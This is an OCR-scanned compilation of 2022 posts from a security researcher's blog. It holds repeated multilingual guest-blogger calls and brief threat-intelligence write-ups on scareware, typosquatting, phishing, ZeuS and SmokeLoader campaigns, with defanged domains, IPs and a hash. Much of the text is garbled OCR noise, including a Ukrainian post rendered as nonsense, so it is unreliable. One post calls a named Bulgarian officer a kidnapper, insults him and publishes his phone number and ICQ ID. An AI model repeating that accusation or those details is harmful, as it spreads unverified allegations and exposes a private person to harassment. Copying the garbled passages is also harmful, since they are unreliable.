Russian OSINT | Catalogado como uno de los principales competidores por Taia Global de Jeffrey 
Carr | Presentado en el GCHQ | Presentado en Interpol | Presentado en InfoSec | Presentado en 
CyberCamp | Presentado en RSA Europe" 


NOTA: Sus articulos como "Guest Post" pueden estar escritos en inglés o en su lengua materna. 
jHagamoslo realidad! 


Enviame un correo electrénico en inglés a dancho.danchev@hush.com para preguntarme sobre 
esta oportunidad, incluyendo una breve presentaci6n, posiblemente con un perfil de LinkedIn 
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o un CV, y en breve me pondré en contacto contigo con la idea de reclutarte y presentarte 
como Guest Blogger oficial en mi blog personal. 


jManténgase en sintonia! 


1. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVVXsEhJDOGbf£kO1gY5rW984MG8xZLm1 j jwFt21D644Ft vNCUUg7d 
UlaMx jNW-D401wRFRfeK1VInghluitZPzonZuDwNuuBMSuvwT66k-W 


18.11.36 Kdo Zeli postati gostujoci bloger na tem blogu? (2022-11-02 13:03) 


[1] 


Dancho Danchev's Vlog 
opic: "Psychedelic Reality" 
ost: Dancho Danchev 
osition: Independent Contractor 
eb Site: https://ddanchev.blogspot.com 
mail: dancho.danchev@hush.com 


Dragi bralci bloga, 


Ali veste veliko o informacijski varnosti, raziskavah kibernetskega kriminala OSINT in zbiranju 
obvescevalnih podatkov o groznjah, vkljucno z raziskavami akterjev kibernetskih grozenj? Ali 
vas zanima, da bi postali gostujoci bloger na tem blogu, kjer boste lahko dosegli eno najboljsih 
in najbolj raznolikih obcinstev v varnostni industriji od decembra 2005, ki jo sestavljajo varnos- 
tni strokovnjaki raziskovalci prodajalci in organizacije, vkljucno z raziskovalci kibernetskega 
kriminala obvescevalne skupnosti ZDA ter agencije in organizacije za kazenski pregon? 


Kdo je Dancho Danchev in kaj je njegov blog? 


"Neodvisni izvajalec | Astalavista.com 2003-2006 | Astalavista.box.sk 2020-2022 | Udelezenec 
Lovely Horse | Dvakrat na Slashdotu | Ex-ZDNet | Ex-Webroot | Zmaga Jessy H. Neal | Osvojil 
nagrado revije SCMagazine | Unicil botnet Koobface | Predstavil se je na GCHQ s projektom 
Honeynet | SCMagazine Who to Follow on Twitter za leto 2011 | Sodeloval v strogo zaupnem 
programu GCHQ, imenovanem "Lovely Horse" | Prepoznal glavno zrtev napada SolarWinds - 
PaloAltoNetworks | Na spletni strani Flashpoint naSel Skodljivo programsko opremo | Spremijal 
in profiliral botnet Koobface ter razkril enega od operaterjev botneta | Dvakrat se je pojavil na 
Slashdotu | Moj osebni blog je dobil 5. 6 milijonov ogledov strani od decembra 2005 | Moj stari 
racun na Twitterju je dobil 11 000 sledilcev | Na svojem blogu sem imel povprecno 7 000 bralcev 
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RSS | Imam svoj vinil "Blue Sabbath Black Cheer / Griefer - We Hate You Dancho Danchev", ki 
ga je izdelal kanadski umetnik | Trenutno vodim Astalavista.box. sk | Dal sem intervju za DW o 
botnetu Koobface | Dal sem intervju za NYTimes o botnetu Koobface | Dal sem intervju za ruski 
OSINT | Podjetje Taia Global Jeffreyja Carra me navaja kot glavnega konkurenta | Predstavljen 
na GCHQ | Predstavljen na Interpolu | Predstavlijen na InfoSec | Predstavijen na CyberCamp | 
Predstavljen na RSA Europe" 


OPOMBA: Clanki za gostujoce objave so lahko napisani v angle&¢cini ali v vagem maternem 
jeziku. Naj se to zgodi! 


PoSljite mi elektronsko sporocilo v anglescini na naslov dancho.danchev@hush.com v smislu 
povprasevanja 0 tej priloznosti, vkljucno s kratko predstavitvijo, po moZnosti vkljucno s profilom 
Linkedin ali zivljenjepisom, in kmalu se vam bom oglasil z idejo, da vas pridobim in predstavim 
kot uradnega blogerja za goste na mojem osebnem blogu. 


Ostanite z nami! 


1. https: //blogger.googleusercontent.com/img/b/R29vZ2x1/AVVXsEj YdVmb8m0ir8cAxS018NuJPvhHQGhy vOMy5MZWzCqJ60FCC 
02F1B7850Pe_7oKEdPziLyzlgG8wX294BHf 7k1hDzKyf YCIOB5KD5k 


18.11.37 Vem vill bli gastbloggare pa den har bloggen? (2022-11-02 13:04) 


[1] 


FROWID 


Dancho Danchev's Vlog 
opic: "Psychedelic Reality" 
ost: Dancho Danchev 
osition: Independent Contractor 


Kara blogglasare, 


Vet du mycket om informationssakerhet cyberbrottsforskning OSINT och insamling av underrat- 
telser om hot, inklusive forskning om akt6érer inom cyberhot? Ar du intresserad av att bli gast- 
bloggare pa den har bloggen dar du kommer att kunna na ut till en av de basta och mest diver- 
sifierade malgrupperna inom sakerhetsbranschen sedan december 2005, som bestar av sak- 
erhetsexperter, forskare, leverant6rer och organisationer, inklusive cyberbrottsforskare, den 
amerikanska underrattelsemilj6n och brottsbekampande organ och organisationer? 
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5.9.10 Dissecting September’s Twitter Scareware Campaign (2009-09-25 12:03) 


ee | knab190 


Gotcha!, glee! 
http://tinyurl.com/msjjv8 


UPDATE: 4 hours after notification, Twitter has suspended the remaining bogus accounts. 
[1]Until the next time, when the reCAPTCHA recognition gets [2]cost-effectively outsourced 
for automatic [3]scareware-serving purposes. 


Over the last couple of days, my Ukrainian "fan club" - fan club in a sarcastic sense due 
to [4]the love, more [5]love, even [6]more love and [7]gratitude shown so far - has once 
against started abusing Twitter by automatically generating bogus accounts [8]tweeting 
scareware serving links by syndicating Twitter’s trending topics. 


This traffic acquisition tactic is in fact nothing new, and in the case of this Ukrainian cy- 
bercrime enterprise, is done "in between" the rest of their malicious activities. What’s worth 
pointing out is that just like the most recent [9]malvertising campaign at NYTimes.com, 
the Ukrainian gang keeps using domains already in circulation within their blackhat SEO 
campaigns, making it fairly easy to establish connections between these and the ongoing 
Twitter campaign. 
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Vem ar Dancho Danchev och vad ar Dancho Danchevs blogg? 


"Oberoende entreprenor | Astalavista.com 2003-2006 | Astalavista.box.sk 2020-2022 | Lovely 
Horse Participant | Slashdotted Two Times | Ex-ZDNet | Ex-Webroot | Won Jessy H. Neal Award 
| Won SCMagazine Award | Took Down the Koobface Botnet | Presented at the GCHQ with the 
Honeynet Project | SCMagazine Who to Follow on Twitter for 2011 | Deltagit i ett topphemligt 
GCHQ-program kallat "Lovely Horse" | Identifierat ett stort offer for SolarWinds Attack - PaloAl- 
toNetworks | Hittade skadlig kod pa Flashpoints webbplats | Sparat, 6vervakat och profilerat 
Koobface Botnet och avsldjat en botnet-operatér | Hamnat pa Slashdot tva ganger | Min per- 
sonliga blogg fick 5. 6 miljoner sidvisningar sedan december 2005 | Mitt gamla Twitter-konto 
fick 11 000 féljare | Jag hade i genomsnitt 7 000 RSS-lasare pa min blogg | Jag har min egen 
vinyl "Blue Sabbath Black Cheer / Griefer - We Hate You Dancho Danchev" tillverkad av en 
kanadensisk artist | Driver for narvarande Astalavista.box. sk | Jag gav en intervju till DW om 
Koobface-botnatet | Jag gav en intervju till NYTimes om Koobface-botnatet | Jag gav en intervju 
till Russian OSINT | Upptagen som en stor konkurrent av Jeffrey Carrs Taia Global | Presenterad 
pa GCHQ | Presenterad pa Interpol | Presenterad pa InfoSec | Presenterad pa CyberCamp | 
Presenterad pa RSA Europe" 


OBS: Dina gastartiklar kan skrivas antingen pa engelska eller pa ditt modersmal. Lat oss fa det 
att handa! 


Skicka mig ett e-postmeddelande pa engelska till dancho.danchev@hush.com for att fraga om 
denna modjlighet och skicka en kort introduktion, inklusive en LinkedIn-profil eller ett CV, sa 
aterkommer jag inom kort med en idé om att varva dig och presentera dig som en officiell 
gastbloggare pa min personliga blogg. 


Hall Ggonen 6ppnala 


1. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVVXsEjDQFG6FbREO1N-__poObWvAaYFUnwoXQ_AvP89VvicIVrbA 
eQfcrbD_LFJ84jS£RMPXcuh2W314sa_zaHnwF 9COSFWpmQF jF J8uec 


18.11.38 Kim bu blogda konuk blog yazari olmak ister? (2022-11-02 13:05) 


[1] 
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FROWID 


Dancho Danchev's Vlog 
opic: "Psychedelic Reality" 
ost: Dancho Danchev 
osition: Independent Contractor 


Sevgili blog okuyuculari, 


Siber tehdit aktorleri Uzerine arastirmalar da dahil olmak uzere bilgi guvenligi siber suc arastir- 
malart OSINT ve tehdit istihbarati toplama hakkinda cok sey biliyor musunuz? Aralik 2005’ten 
bu yana siber suc arastirmacilari, ABD istinbarat toplulugu ve kanun uygulayici kurum ve kuru- 
luslar da dahil olmak Uzere gUvenlik profesyonelleri, arastirmacilar, saticilar ve kuruluslardan 
olusan guvenlik endustrisindeki en iyi ve en cesitli kitlelerden birine ulasabileceginiz bu blogda 
konuk blog yazar! olmakla ilgileniyor musunuz? 


Dancho Danchev kimdir ve Dancho Danchev’in blogu nedir? 


"Bagimsiz Yuklenici | Astalavista.com 2003-2006 | Astalavista.box.sk 2020-2022 | Lovely Horse 
Participant | Slashdotted Two Times | Ex-ZDNet | Ex-Webroot | Won Jessy H. Neal Odili Kazandi | 
SCMagazine Odulti Kazandi | Koobface Botnet’i Devirdi | Honeynet Projesi ile GCHQ’da Sunuldu 
| SCMagazine 2011’de Twitter’da Kimleri Takip Etmeli | "Lovely Horse" adli cok gizli bir GCHQ 
programina katildi | SolarWinds Saldirisinin Gnemli bir kurbanini belirledi - PaloAltoNetworks | 
Flashpoint web sitesinde kotU amacli yazilim buldu | Koobface Botnet’i takip etti, izledi ve pro- 
filini cikardi ve bir botnet operatértinu ortaya cikardi | iki kez Slashdot’a girdi | Kisisel blogum 5. 
Aralik 2005’ten bu yana 6 milyon sayfa goruntulemesi | Eski Twitter hesabimin 11.000 takipcisi 
var | Blogumda ortalama 7.000 RSS okuyucum var | Kanadalli bir sanatc¢ tarafindan yapilmis 
kendi plagim "Blue Sabbath Black Cheer / Griefer - We Hate You Dancho Danchev" var | Su 
anda Astalavista.box. sk | Koobface botnet hakkinda DW’ye rdportaj verdim | Koobface bot- 
net hakkinda NYTimes’a rdportaj verdim | Russian OSINT’e rdportaj verdim | Jeffrey Carr’in 
Taia Global’i tarafindan buyUk bir rakip olarak listelendim | GCHQ’da sunum yaptim | Inter- 
pol’de sunum yaptim | InfoSec’te sunum yaptim | CyberCamp’te sunum yaptim | RSA Europe’da 
sunum yaptim" 


Not: Konuk makaleleriniz ingilizce veya ana dilinizde yazilabilir. Hadi bunu gerceklestirelim! 


Bu firsat hakkinda bilgi almak icin bana dancho.danchev@hush.com adresine ingilizce bir e- 
posta gonderin ve LinkedIn profili veya CV’nizi de igeren kisa bir tanitim g6nderin; sizi ise alma 
ve kisisel blogumda resmi bir konuk blog yazari olarak yer verme fikriyle kisa sUre icinde size 
geri ddnecegim. 
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Bizi izlemeye devam edin! 


1. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEhn5xF1Tc1G4s028q_THJ2K_KulNSIruXQKVKNUtffwyeoKI 
TJ4VulHDrMA51PVj1frLVgRqORNGgce7Rbh2do115LnP8USH4AI3Th 


18.11.39 XtTo xoue O6yTn 3anpoweHuM OnorepomM Ha UbOMy ON03i? (2022-11-02 13:06) 


[1] 


Dancho Danchev's Vlog 
opic: "Psychedelic Reality" 
ost: Dancho Danchev 
osition: Independent Contractor 
eb Site: https://ddanchev.blogspot.com 


LUaHOBHi 4YUTAaHi BNOry, 


Bu 3HaeTe OaraTo Npo AOcnigKeHHA Kibep3NOYWHHOCTI B Ccepi iHdopmMauinHo! G6e3neku, OS- 
INT Ta 36ip po3BigyBanbHo! iHctbopmMauii Npo 3arpo3uv, BKNHOYAaOUN BOCNiQ*KeHHA cy6’eKTiB 
Kidep3arpo3? Yu 3auikaBNeHi BU B TOMY, LOO CTaTU 3aNnpOWeHUM ONorepom LUboro Onory, 
Oe BYU 3MOKeTE OTPUMATH AOCTYN AO OAHiEl 3 HANKPALUX i HANPIZHOMAHITHILUMUX AYAUTOPIN B 
iHgyctpii 6be3neku 3 rpygHa 2005 poky, WO CKNagaeTbca 3 cbaxiBuiB 3 6e3neku, DOCHIQHUKIB, 
nocTayaNbHunkiB i OpraHizauin, BKMOYAIONN AOCHIAHUKiB Ki6ep3NOYWMHHOCTI, PO3BIOYBasIbHe 
cniBTOBapucTBO CLUA, a TakKOxK NpaBOoXxOpoHHi OpraHy i OpraHi3auii? 


XTO Taku DaHyo Janyes i wo Take 6Onor JaHyo DaHyesa? 


"He3zanexHun nigpagHuKk" | Astalavista.com 2003-2006 | Astalavista.box.sk 2020-2022 | 
YuacHuK KOHKypcy "MpekpacHuu kiHb" | JBiyi HOMiIHOBaHUN Ha Npemito Slashdotted | Ex-ZDNet 
| Ex-Webroot | Burpas npemito Jessy H. Hina | BurpaB Haropogzy SCMagazine | 3pynmHyBaB 
6oTHeT Koobface | NpegactasneHun B GCHQ 3 npoektom Honeynet | SCMagazine Who to Fol- 
low on Twitter 3a 2011 pik | BpaB yyacTb y HagceKpeTHiN Nporpami GCHQ niga Ha3Bol0 "Lovely 
Horse" | [MeHTUdikyBaB OCHOBHy *®epTBy ataku SolarWinds - PaloAltoNetworks | 3HamwoB 
WkiAUBe nporpamMHe 3a6e3ne4eHHA Ha BeOb-cauTi Flashpoint | BigcTtex«yBaB, BIgCTe*«yBaB | 
npodintoBaB 6oTHeT Koobface i BUABUB ONepaTopa SoTHeTy } JBiyi noTpannsaB B Slashdot | Min 
oco6uctun 6nor Habpas 5. 6 MinbNOHiB NeperNAAIB CTOPIHOK 3 rpyGHaA 2005 poky | Mi” cTapun 
akayHT y Twitter oTpuMaB 11 000 nignucHukis | Y MeHe Oyno B CepegHbomy 7 000 RSS-uuTayiB 
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moro 6nory | Y MeHe € BNaCcHa MsaTiBKa "Blue Sabbath Black Cheer / Griefer - We Hate You 
Dancho Danchev", 3anucaHa KaHaQCbKYM BUKOHAaBLIeM | B AaHun yac Kepyw Astalavista.box. 
sk | Mas idHtepB’to DW npo O6oTtHeT Koobface | Jas inTepB’to NYTimes npo 6boTHeT Koobface | 
Has inTepB’to pocinvcbkomy OSINT | BKmto4eHun fo ChMCKy OCHOBHUX KOHKypeHTiB Taia Global 
Oxedadpi Kappa | NpegctasneHun B GCHQ | Npegactasnenun B IHTepnoni | NpegctaBneHun B 
InfoSec | MpeactaBneHun B CyberCamp | NpeactasBnenun B RSA Europe" 


Npumitka: Bawi roctboBi cCTaTTi MOKYyTb 6yTU HaNnucaHi AK AHNINCbKOW, Tak | BALUOIO PiQHO!O 
moBow. JjaBante 3p06umMo We MOKNMBUM! 


Hagiwwnitb MeHi @NeKTPOHHOrO NMCTa = aAHriINCbKOIO MOBOIO Ha agpecy’ dan- 
cho.danchev@hush.com, wWo6 gi3HaTUCA NpoO UW MOMKAMBICTb i HagicnaTW KOpOTKe BCTyNHe 
CNOBO, BKJIOYAaIOYUN Npodinb LinkedIn a6o pe3tome, i A He3a6bapoM 3B’AKYCA 3 BAM 3 iMeE!O 
HaNHATH Bac i PO3MICTUTH Bac B AKOCTI OCPIWINHOrO rOocTBOBOroO GNorepa Ha MOEMy OCObuCcTOMy 
6n03i. 


BanUWaNTecb 3 Hamu! 


1. https: //blogger.googleusercontent.com/img/b/R29vZ2x1/AVVXsEg__hUzP8BGPE1j yLbJbHeZgn10mtrWEUN3RhOdHFIoYHXqc 
rMvAAsfAORuKDB_t- yH1h7DOsKO4yT7wzkzj9VbubjX84yuAbNG_sH 


18.11.40 Who Wants to Become a Guest Blogger At This Blog? (2022-11-02 17:15) 


[1] 


FROWID 


Dancho Danchev's Vlog 
opic: "Psychedelic Reality" 


Dear blog readers, 


Do you know a lot about information security cybercrime research OSINT and threat intelligence 
gathering including cyber threat actors research? Are you interested in becoming a Guest 
Blogger on this blog where you will be able to reach out to one of the best and most diverse 
audience within the security industry since December, 2005 which consists of security experts 
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researchers vendors and organizations including cybercrime researchers the U.S Intelligence 
Community and Law Enforcement agencies and organizations? 


Who is Dancho Danchev and what is Dancho Danchev’s Blog? 


"Independent Contractor | Astalavista.com 2003-2006 | Astalavista.box.sk 2020-2022 | Lovely 
Horse Participant | Slashdotted Two Times | Ex-ZDNet | Ex-Webroot | Won Jessy H. Neal Award 
| Won SCMagazine Award | Took Down the Koobface Botnet | Presented at the GCHQ with the 
Honeynet Project | SCMagazine Who to Follow on Twitter for 2011 | Participated in a Top Se- 
cret GCHQ Program called "Lovely Horse" | Identified a major victim of the SolarWinds Attack 
- PaloAltoNetworks | Found malware on the Web Site of Flashpoint | Tracked monitored and 
profiled the Koobface Botnet and exposed one botnet operator | Made it to Slashdot two times 
| My Personal Blog got 5.6M Page Views Since December, 2005 | My old Twitter Account got 
11,000 followers | | had an average of 7,000 RSS readers on my blog | | have my own vinyl 
"Blue Sabbath Black Cheer / Griefer - We Hate You Dancho Danchev" made by a Canadian 
artist | Currently running Astalavista.box.sk | | gave an interview to DW on the Koobface Botnet 
| | gave an interview to NYTimes on the Koobface botnet | | gave an interview to Russian OSINT 
| Listed as a major competitor by Jeffrey Carr’s Taia Global | Presented at the GCHQ | Presented 
at Interpol | Presented at InfoSec | Presented at CyberCamp | Presented at RSA Europe" 


NOTE: Your Guest Post articles can be written either in English or in your native language. Let’s 
make this happen! 


Send me an email in English at dancho.danchev@hush.com in terms of inquiring about this 
opportunity including a short introduction including possibly a LinkedIn profile or a CV and I'll 
shortly get back to you with the idea to enlist you and present you as an official Guest Blogger 
at my personal blog. 


Stay tuned! 


1. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVVXsEiJRjxcB9yos30bRdS1 jvLrkn7 YnyE4uluh2SwAcJ1anLHak 
aNOp7TgsyiHxToKmWy5BZ16wLGK7 yWpmwoAe_WpIVTVDKiBmp87CD 


18.11.41 The Deepest of Them All - A Profile of Yavor Kolev - a Bulgarian Law 
Enforcement Officer Kidnapper and a Bulgarian Dipshit - An Analysis 
(2022-11-03 07:20) 


[1] 
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Psst - where’s approximately of $85,000 of my own money which | earned legally throughout 
the period 2012-2014? And where approximately 80 % of my health based on my health 
pension records which Bulgaria’s DANS gave me? 


Ask this [2]guy which | told you about in advance circa 2010. The results? We can’t wait to see 
them when the real Bulgarian Law Enforcement learns about this including the actual illegal 
detention and restraint courtesy of Bulgarian Law Enforcement officers in my hometown Troyan, 
Bulgaria who stole my personal ID made a copy and locked me in a cell with no explanation 
for a period of four months including to lock down my phone with no explanation and no one 
knowing about this. 


¢ Check out the blog post series [4]here 


[5] 
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Psst - Part Two - | don’t use phones. Call him here - +359888795021 or send him an invitation 
[6]here including ICQ - 48495113. 


Stay tuned! 


1. 
2, https //Ainkedin. con/in/yavorkolev 

3. 
4, https: //adanchev. blogspot .con/search/label/ Bulgaria 

5, htps: / blogger. googleusercontent .con/ing/b/R29vZ2x1/ AVwKsEganyi_SQBV6g94-xn1 edt enTAGEYYedhyBzsYA1DpsgU 
6. https://Linkedin, con/in/yavorkolev 


18.11.42 Joseph Mlodzianowski Joining Dancho Danchev’s Blog as Guest Blogger - 
Stay tuned! (2022-11-03 10:47) 


he 


[1] 
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Hi, everyone, 


This is Dancho and | have some big news. Joseph Mlodzianowski ([2]Twitter; [3]LinkedIn) is 
joining my personal blog as an official Guest Blogger starting as of today so stay tuned for 
some high-quality security and information security research and articles to be published here 
courtesy of him. 


Joseph's [4]BIO: 


"Joseph has a long and distinguished history of leading large teams of project, program Man- 
agers, architects, Cybersecurity Engineers and developers in the design, deployment and man- 
agement of a number of multi-million dollar commercial and DoD projects. A Network, and Cy- 
bersecurity infrastructure expert, published author, Course Developer and Trainer; Joseph has 
many certifications including the Cisco CCIE, CNE, CISSP, ITILv4. Joseph worked at the Depart- 
ment of Defense, the NSA, CIA and State Department for more then ten years as an operator, 
and SME, where he performed CNE/CNA functions and later led large teams to architect and 
build many Data Centers, Critical infrastructure and big data systems, all in pursuit of National 
Security initiatives.". 

Thank you Joseph for the interest and | hope that you'll soon find the chance to begin contribut- 
ing with high-quality security and information security research articles here. 

Stay tuned! 

1. 
2. 

3 

4 


18.11.43 Exposing a Rogue Google AdSense Campaign Using Typosquatted Malware 
Serving Software Releases - An Analysis (2022-11-03 11:14) 


[1] 
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Google  snisscsin (Zenon) Seneaeeee 


Doorzoek: © het internet O pagina’s in het Nederlands © pagina’s wit Nederfand 
Het internet 


Download Winamp Media Player 5.541 - Download Winamp Media Player ... - [ 
Download Winamp. The #1 Free Media Player Play your MP3. AAC, MPEG, AVI files. and 
more. Get tree MP3 songs. vdeos, skins and toca = 

wow winoenp coen’player - 56k ¢ 


Winamp Media Player - MP3, Multimedia, and Music Player -[ Ver pages 
eMusic Gees Winamp Users 50 Free Mesic Downloads +1 Free Audiobook! ... Download 
Winamp, The #1 Free Meda Ploy. pf Laake ve, MPEG. AVI files. . 

www papas com/ - 60k ? 3 3 


abs f eri - Medi > 
Alles wat u welt weten over Winamp Free! ... Download apa Free ... Download Winamp 
Download Winamp Lie (alleen voor naps 


Resultaten 1 - 10 van cca 1,150,000 voor download winamp tree 


Meuwe on laatste versie 2009 
Excluseve gegarandeerde download 
winamp.winamp-co com 


TIS. Muziek n 
Neuwste Mp3 Muziek Downloads 
Snel, Veilig & 100% Legaal 
Muziek downloadboxx com/Mp3 


Muziek GRATIS Downloaden 
Simpel, Makkelyk en Snel 


www gratissotwareste olwinamp hire! - 21k ' pagina al je Favonete Muziek Downloaden 
wrew Grates MunekDownloades metimp3 
Winamp Media Player - MP3-speler, Mutimediaspeler, MP3-muziek ... 


Dear blog readers, 


| wanted to share with everyone the details including the actual technical details behind a what 
appears to be a rogue and fraudulent Google AdSense campaign that’s using popular software 
download keywords for the purpose of serving rogue and bogus potentially malicious software 
to unsuspecting users including the actual domain portfolio behind the campaign. 


Sample screenshots include: 


[2] 
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azureu 


amule-co.com 
lin omp.com 
vu m 


theplanet.corm adobe-reader-co.com 


wtheplanet. com adware-co.com 
wtheplanet.com flash-pla 
paint-shop-pro,com 
winrar-co,com 
ccleaner-co,com 
theplanet.com 
2, theplanet.com 
wtheplanet.com 
wtheplanet.com 
theplanet.com 
wtheplanet.com ger-comp.com 


theplanet.com 


theplanet.com 
theplanet.com 
.theplanet.com office-co.com 
.theplanet.com yirtualdj-co.com 
zattoo-co,com 
2. theplanet.com clonecd- 
2, theplanet.com tuneup-co.com 
3-222. theplanet.com plorer-co.com 
85-73-222, theplanet.com 
2, theplanet.com 
wtheplanet.com 
wtheplanet.com n nger-plus-live-co.com 
wtheplanet.com regcleaner-c 
theplanet.com 


2. theplanet.com download-acelerator.com 


Stay tuned! 


1. https: //blogger . googleusercontent . com/img/b/R29VZ2x1/AVvXsEi 1eE9eYbf 5f AqsxbQWJI-LbBZpW4Ep_5tPbv9QBgwvkZVYB 
3rsWxSxvcXH9v30YfvrdgnelLbr1qzzjKPPF j48NVTBpEi YwDoS jBj 
2. https: //blogger . googleusercontent . com/img/b/R29VZ2x1/AVvXsEjZ1Wq- 9Q20Nn0rqi2eg91sZweEkizNhCkT2xurlJPjww30Z 
GqBbeaWq5WQf VWwQxF72N7Yf£3Rh8We j 1MnLLrjHDEau-4VM8yMivDh 


18.11.44 Profiling a Sample Scareware Serving Keywords Analysis Twitter Campaign 
- An Analysis (2022-11-03 11:17) 


[1] 
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Hey there! zastrow994 is using 
Twitter. 


Tunitier is a free service that lets you keep in touch with people through ten woe nen? Coa hae 
the exchange of quick, frequent answers 10 one sample quesbon What 
are you doing? Join today to start recesang zastrow994's tweets 


“  zastrow994 


Gle Not bad, really. See 
http://is.gd/3BZqa 


Sep 28 fom wet 
ATT Dlackosd Pimp /tnywel commsyvé 
6 12 Pt Sep Dies fom wee 
Pip Wa QOEDTTS creative Brand New Eyes 
$12 Pat Sep 2Oe8 Hom wee 


Yaaay! (0 watching >OstKt 0< mowe Mere Nip (iteryun comvensgvs 
ODST Giee OR gee muskmonday 


$12 Pat Sep 28 Yom wet 


WARNING!! Twitter worm and phishing scam! nttp va gaTo71S — 
Crand new eyes. glee, phaps. HINTIT IT 


$12 Pet Sep Tied Pom wed 


2 thangs in Me | cant bve wihoot: Fuzzbal and HINT.) 
inp iss. 938200 


§ 12 Pt Sep Diet Yom wee 


RT @icttan Even lebenese oelegates waked out on AN 
DMD a QOEDTIS raneiecton Geeenny 


$11 PAs Sep 208 rom wet 


day-Z | past Qot a free iphone today tor pustsumeting my ema Oo 
you wart 0me711111hmp Nis 98298 


$11 Pat Sep 2308 fom wed 


By the time Twitter suspends the automatically registered bogus accounts, on average, 70 to 
80 tweets have been published per single account. Here’s the most recent list of currently 
active Twitter accounts tweeting scareware links: 

twitter.com /verinal238 

twitter.com /knab190 


twitter.com /zastrow994 
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Wan22040 248 HSS 2H ANTI HID 2D 2D HF 2H TOS RTE BRED aa?) 2ee RBBB 2908222 


A. eichners 13: Unreal adult httputgirbtubes.cr/ 
A exhner4 13: Follow the adult httpugirtubes crv 


Dear blog readers, 


If an image is worth a thousand words check out the following keywords analysis for what 
appears to be a scareware serving Twitter campaign which | profiled back in 2010. 


Stay tuned! 


1. https: //blogger .googleusercontent.com/img/b/R29vZ2x1/AVvXsEh2T_trM2RkiL-Ha8v10iUoqK5YJ1rFHPf8iLSGC7FDLHKI 
qdiMPz-PBQkHhT21fq8vt59EMcSEWMIV8 Jralh8I3IE9GUELISZxWQ 


18.11.45 Exposing a Sample Rock Phish Phishing Campaign’s Botnet Hosted Infras- 
tructure - An Analysis (2022-11-03 11:20) 


[1] 
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DE GAG TG mS 179 NSTI CO.COMCASI NT 
, s 899649 
4 seghoodeam com 248 TE ———— ANTS) 
ASS teshQOOR* ae SereEr Com $oe-O65- 184-029-219 carctira res tt com Oey 7 
= aad 
SOE 0G i, 61 18) ge ASAE 
a 


ear eg a 668 4 7-93-152 nsct ga comeastion 


ad Sg 
uSte69-1-23-242Anology met 6847 O.0NT em Asie 
Ns! reammename server com 
el 
2100 A ASI IE? 


6 one 
694.2326) cc 
© 78-237 194-165. Nsdt ma comcasinet 


a" 


TH 233994 155 ll ge 7425920015 
5 
. AS 
; oR 229.00N6 
ne 
Hm 058-228-1601 14 nest ctcomeastnnt 


7217841.38 re 
2174 41.38 host T2-1 74-41-96 od}-co chant beesnan net 
se 


TRATED he ASIISGE 


i 
OO eT 


99-196 196-235 nest & comcastnet 
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Did you know that a huge percentage of Rock Phish related campaigns are known to have been 
hosted on a fast-fluxed botnet infrastructure where the ultimate goal is to make them impossi- 
ble to take offline or basically increase the average time it takes for vendors or researchers to 
attempt to take the domains offline? 


In this post I'll share with everyone a sample portfolio of Rock Phish themed screenshots where 
the ultimate goal is to present my findings in the context of providing actionable intelligence on 
the fact that on the majority of occasions Rock Phish gang’s campaigns continue to be hosted 
on a fast-fluxed botnet infrastructure. 


Sample screenshots include: 
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Stay tuned! 
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18.11.46 Exposing a Russia-Based Stolen and Compromised Credit Cards Checking 
Web Site - An Analysis (2022-11-03 19:15) 
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Dear blog readers, 


I’ve decided to share with everyone some screenshots which | took from the infamous back 
in 2010 stolen and compromised credit cards checking service hxxp://ccchkr.com which uses 
a variety of methods and techniques to check the validity of stolen and compromised credit 
cards on a mass scale. 


Sample screenshots include: 
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Stay tuned! 
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18.11.47 Profiling a Email Password Harvesting Enabled Malicious Software Release 
- An Analysis (2022-11-03 19:23) 
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Dear blog readers, 


I’ve decided to share with everyone sample screenshots which | took back in 2010 while doing 
research in specific the malicious release’s capability to eavesdrop on email communications 
initiated from the hosts of the affected victims part of the botnet with some pretty interesting 
and sophisticated features where the actual botnet master behind the release has already man- 
aged to accumulate some pretty decent stolen and compromised SMTP and POP3 accounting 
information. 


Sample screenshots include: 
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Stay tuned! 
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18.11.48 Profiling the ZeusEsta Managed ZeuS Crimeware Hosting Service - An Anal- 


ysis (2022-11-03 20:25) 
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Dear blog readers, 


Back in 2009 | came across to a pretty interesting and easy to use sophisticated ZeuS crime- 
ware managed hosting service which was basically enticing users into becoming customers of 
a managed ZeuS crimeware service which was basically offering them everything they need 
to enter the world of cybercrime in specific managed crimeware releases. 


Sample URL known to have been involved in the campaign includes: 
hxxp://zeuspanel.name - 94.102.56.63 
Stay tuned! 
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18.11.49 Profiling the Limbo Crimeware Malicious Software Release - An Analysis 
(2022-11-03 21:28) 
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These screenshots were obtained in 2009 courtesy of me while doing research. 
An image is worth a thousand words. 


Sample screenshots include: 
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Stay tuned! 
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18.11.50 SmokeLoader Themed Malware Serving Campaign Spotted in the Wild - An 
Analysis (2022-11-15 04:52) 


[1] 


Dear blog readers, 


I’ve decided to share with everyone some technical details behind a currently circulating mali- 
cious software serving campaign that’s dropping a SmokeLoader variant on the targeted host 
and is using a variety of C &C server domains for communication with the malicious attackers. 


Sample screenshots include: 


[2] 
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AVN 
© ® 


Privacytools-for-you-453.com www.host-file-host6.com stats404.info 


coin-coin-coin-2.com instalrocket.store 


[4] 
Se ee eee 
[5] 
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Change when thee rotfcwmers weoee 


Sample campaign structure: 


MD5: ccaf26afe7db068aa11331f6c5af14d8 


hxxp://host-file-host6.com - 34.106.70.53 


hxxp://host-host-file8.com 
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IFRAME: [6]https://www.virustotal.com/graph/embed/g198735838d4d4f798cb99d0fa85543da 
c97a79158bd34b29a995e8ef778cf575 


Sample related responding IPs known to have been involved in the campaign include: 
hxxp://176.124.221.9 
hxxp://23.48.95.144 
hxxp://45.91.8.70 
hxxp://185.144.28.175 
hxxp://31.44.185.182 
hxxp://8.209.65.68 
hxxp://45.134.27.228 
hxxp://2.16.165.19 
hxxp://185.251.89.108 
hxxp://195.186.210.241 
Stay tuned! 


1. https: //blogger . googleusercontent . com/img/b/R29VZ2x1/AVvXsEj eRviQ1l4vKwm03bY_aoypuvhWuoZex8R1fUKaukqkXsn- 3E 
7_NMxPUsBqVFMtCy-xNS7_jELROMbxj-7YRDio7tCvVEQGSDGVTCAM 

2. https: //blogger. googleusercontent . com/img/b/R29vZ2x1/AVvXsEjNoJyBG8wOppXZeBHRvuYuf QAyBDUeKnzGnOXXOPLZXYDaj 

c811cWXoqI gWRQ8REG15qyAXiiidd7ciVeNIQ7mGxWjZ_BmqkA9WZR 

